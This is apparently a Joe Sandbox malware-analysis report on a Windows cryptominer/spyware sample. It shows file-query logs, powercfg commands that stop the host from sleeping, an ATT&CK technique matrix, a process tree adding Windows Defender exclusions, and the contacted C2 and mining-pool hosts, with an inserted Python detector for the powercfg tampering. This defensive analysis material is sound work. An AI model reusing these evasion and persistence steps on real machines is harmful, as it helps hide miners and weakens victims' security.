    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935D6770 GetSystemTimeAsFileTime,58_2_00007FF6935D6770

    Lowering of HIPS / PFW / Operating System Security Settings

    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 (4 occurrences)
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 (4 occurrences)
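The two powercfg command lines above zero the AC standby and hibernate timeouts, so the host never sleeps while the miner runs. The following is an added example, not code from the Joe Sandbox report or from the sample: a small Python detector that runs over process-creation records in the Image/ParentImage/CommandLine shape of a Sysmon Event ID 1 log and flags any powercfg change that sets a sleep or hibernate timeout to 0. It generalizes beyond the two command lines on this page to the /change spelling, the -dc variants and a cmd /c wrapper. The SAMPLE_EVENTS records, the loader.exe parent and the explorer.exe benign cases are constructed for the example.

```python
"""Detect powercfg runs that disable sleep/hibernation (constructed input, see lead-in)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Timeout settings accepted by `powercfg /change`; `/x` is the documented alias used in the report.
TIMEOUT_SETTINGS = {
    "monitor-timeout-ac", "monitor-timeout-dc",
    "disk-timeout-ac", "disk-timeout-dc",
    "standby-timeout-ac", "standby-timeout-dc",
    "hibernate-timeout-ac", "hibernate-timeout-dc",
}
# Zeroing these keeps the machine (and the miner) awake; monitor/disk timeouts are just noise.
SLEEP_SETTINGS = {s for s in TIMEOUT_SETTINGS if s.startswith(("standby", "hibernate"))}


@dataclass(frozen=True)
class Finding:
    parent_image: str   # who launched powercfg (cmd.exe in the report)
    setting: str        # which sleep/hibernate timeout was zeroed


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line; quoted paths stay together, quotes are stripped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def unwrap_cmd(tokens: list[str]) -> list[str]:
    """For `cmd /c <inner command>` (or /k) return the inner tokens; otherwise return as-is."""
    if tokens and basename(tokens[0]) in ("cmd.exe", "cmd"):
        for i, tok in enumerate(tokens[1:], start=1):
            if tok.lower() in ("/c", "/k"):
                return tokens[i + 1:]
    return tokens


def powercfg_zeroed_timeouts(cmdline: str) -> list[str]:
    """Timeout settings this command line sets to 0; [] unless it is a powercfg /change (/x)."""
    toks = unwrap_cmd(tokenize(cmdline))
    if len(toks) < 4 or basename(toks[0]) not in ("powercfg.exe", "powercfg"):
        return []
    if toks[1].lstrip("/-").lower() not in ("x", "change"):   # powercfg takes "/" or "-" switches
        return []
    zeroed = []
    args = toks[2:]
    for setting, value in zip(args[0::2], args[1::2]):         # /change takes <setting> <minutes> pairs
        name = setting.lstrip("/-").lower()
        if name in TIMEOUT_SETTINGS and value.isdigit() and int(value) == 0:
            zeroed.append(name)
    return zeroed


def detect(events: list[dict]) -> list[Finding]:
    """One Finding per sleep/hibernate timeout zeroed by any event."""
    findings = []
    for ev in events:
        for name in powercfg_zeroed_timeouts(ev["CommandLine"]):
            if name in SLEEP_SETTINGS:
                findings.append(Finding(basename(ev["ParentImage"]), name))
    return findings


def summarize(findings: list[Finding]) -> dict[str, list[str]]:
    """Group zeroed settings by launching parent; both AC timeouts from one parent is the report's pattern."""
    out: dict[str, set[str]] = {}
    for f in findings:
        out.setdefault(f.parent_image, set()).add(f.setting)
    return {parent: sorted(settings) for parent, settings in sorted(out.items())}


# Constructed process-creation records (Sysmon Event ID 1 shape), not taken from the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": "powercfg /x -hibernate-timeout-ac 0"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": "powercfg /x -standby-timeout-ac 0"},
    # Benign: a non-zero monitor timeout and a read-only query.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": "powercfg /change monitor-timeout-ac 10"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": "powercfg /list"},
    # Same tampering via the /change spelling, the -dc variant and a cmd /c wrapper (hypothetical loader.exe).
    {"ParentImage": r"C:\Users\Public\loader.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "C:\\Windows\\System32\\powercfg.exe" -change standby-timeout-dc 0'},
]

if __name__ == "__main__":
    for parent, settings in summarize(detect(SAMPLE_EVENTS)).items():
        print(f"{parent}: zeroed {', '.join(settings)}")
```

Matching on the parsed setting/value pairs rather than on a raw substring avoids alerting on legitimate power-plan changes (a non-zero timeout, or `powercfg /list`), while still catching the `/change` and `-dc` forms that a substring match on the report's exact strings would miss. A single parent zeroing both the standby and hibernate timeout back to back, as cmd.exe does here, is the pattern worth escalating.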
    MITRE ATT&CK Matrix (techniques with signature hits, per tactic; the digits in parentheses are the count markers rendered beside each matrix cell)
    Initial Access: none
    Execution: Command and Scripting Interpreter (11), Scheduled Task/Job (1), Service Execution (1), Native API (1)
    Persistence: Windows Service (11), Scheduled Task/Job (1), DLL Side-Loading (1)
    Privilege Escalation: Windows Service (11), Process Injection (311), Scheduled Task/Job (1), DLL Side-Loading (1)
    Defense Evasion: Masquerading (133), Disable or Modify Tools (1), Modify Registry (1), Virtualization/Sandbox Evasion (121), Process Injection (311), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), DLL Side-Loading (1), File Deletion (1)
    Credential Access: Credential API Hooking (1)
    Discovery: System Time Discovery (1), Security Software Discovery (331), Process Discovery (1), Virtualization/Sandbox Evasion (121), Application Window Discovery (1), System Information Discovery (112)
    Lateral Movement: none
    Collection: Credential API Hooking (1), Archive Collected Data (1)
    Exfiltration: none
    Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (1), Application Layer Protocol (1)
    Network Effects: none
    Remote Service Effects: none
    Impact: none
    Behavior Graph ID: 735874 | Sample: 8iTXwpHCHb.exe | Start date: 02/11/2022 | Architecture: WINDOWS | Score: 100
    Contacted hosts: panel294756.site, pool.hashvault.pro
    Graph-level signatures: Snort IDS alert for network traffic; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 10 other signatures
    Process tree (dropped files and signatures are listed under the process that produced them):
    8iTXwpHCHb.exe
      dropped: C:\Program Files\...\WindowsAutHost (PE32+)
      signatures: Adds a directory exclusion to Windows Defender; Tries to evade analysis by execution special instruction (VM detection)
      cmd.exe: Uses cmd line tools excessively to alter registry or file data; Uses powercfg.exe to modify the power settings; Modifies power options to not sleep / hibernate; 11 other child processes
      powershell.exe: Uses schtasks.exe or at.exe to add and modify task schedules
        conhost.exe: Adds a directory exclusion to Windows Defender
      cmd.exe: 5 other child processes
      3 other processes: 5 other child processes
    WindowsAutHost (second top-level node in the graph)
      dropped: C:\Windows\Temp\34E5.tmp (PE32+); C:\Program Files\Google\Libs\WR64.sys (PE32+)
      signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; 4 other signatures
      cmd.exe: 11 other child processes
      cmd.exe: 5 other child processes
      conhost.exe: Adds a directory exclusion to Windows Defender
        cmd.exe
          conhost.exe
        powershell.exe
          conhost.exe
      3 other processes: Creates files in the system32 config directory; 4 other child processes

    Antivirus, Machine Learning and Genetic Malware Detection

    Sample
    Source | Detection | Scanner | Label
    8iTXwpHCHb.exe | 37% | Virustotal |
    8iTXwpHCHb.exe | 26% | ReversingLabs | Win64.Trojan.Lazy
    8iTXwpHCHb.exe | 100% | Avira | HEUR/AGEN.1249215
    8iTXwpHCHb.exe | 100% | Joe Sandbox ML |

    Dropped Files
    Source | Detection | Scanner | Label
    C:\Program Files\WindowsServices\WindowsAutHost | 100% | Avira | HEUR/AGEN.1249215
    C:\Program Files\WindowsServices\WindowsAutHost | 100% | Joe Sandbox ML |
    C:\Program Files\Google\Libs\WR64.sys | 5% | ReversingLabs |
    C:\Program Files\Google\Libs\WR64.sys | 0% | Metadefender |

    No Antivirus matches
    No Antivirus matches

    URLs (strings recovered from memory; several are truncated as found)
    Source | Detection | Scanner | Label
    https://go.microsoft.c | 0% | URL Reputation | safe
    https://go.microsoft.c | 0% | URL Reputation | safe
    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
    http://crl.microsof | 0% | URL Reputation | safe
    https://go.micro | 0% | URL Reputation | safe
    https://contoso.com/ | 0% | URL Reputation | safe
    https://contoso.com/License | 0% | URL Reputation | safe
    https://contoso.com/Icon | 0% | URL Reputation | safe
    http://crl.osofts/Microt0 | 0% | URL Reputation | safe
    http://www.microsoft.coDk | 0% | Avira URL Cloud | safe
    Domains and IPs
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    panel294756.site | 31.31.198.106 | true | true | | unknown
    pool.hashvault.pro | 199.247.19.116 | true | false | | high
    URLs from memory dumps
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.413252609.00000237D95BF000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://go.microsoft.c | powershell.exe, 00000026.00000002.644851259.0000019FA7837000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000026.00000003.516178284.0000019FA7825000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000007.00000002.396775326.00000237C9768000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://crl.microsof | powershell.exe, 00000007.00000002.419133402.00000237E1C6F000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000007.00000003.375792050.00000237E1C6F000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000007.00000003.392349439.00000237E1C6A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://go.micro | powershell.exe, 00000007.00000003.365569673.00000237CB1C4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000001A.00000002.448943625.0000020D0BCC8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.627931463.0000019F909FA000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.629177405.0000019F90AAB000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.626183947.0000019F90914000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.632077474.0000019F90C6F000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.627601047.0000019F909C5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000007.00000002.396775326.00000237C9768000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://contoso.com/ | powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.413252609.00000237D95BF000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://contoso.com/License | powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://contoso.com/Icon | powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://crl.osofts/Microt0 | powershell.exe, 00000026.00000002.644851259.0000019FA7837000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000026.00000003.516178284.0000019FA7825000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.microsoft.coDk | powershell.exe, 0000001A.00000002.470297536.0000020D2408B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.395084188.00000237C9561000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000001A.00000002.444436769.0000020D0BAC1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000026.00000002.587356639.0000019F8F441000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000040.00000002.587692706.0000023700001000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://github.com/Pester/Pester | powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      No contacted IP infos
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:735874
                      Start date and time:2022-11-02 12:55:32 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 34s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:8iTXwpHCHb.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:66
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.spyw.evad.mine.winEXE@105/19@2/0
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HDC Information:
                      • Successful, ratio: 44.9% (good quality ratio 34.6%)
                      • Quality average: 61.9%
                      • Quality standard deviation: 39.3%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 39
                      • Number of non-executed functions: 98
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
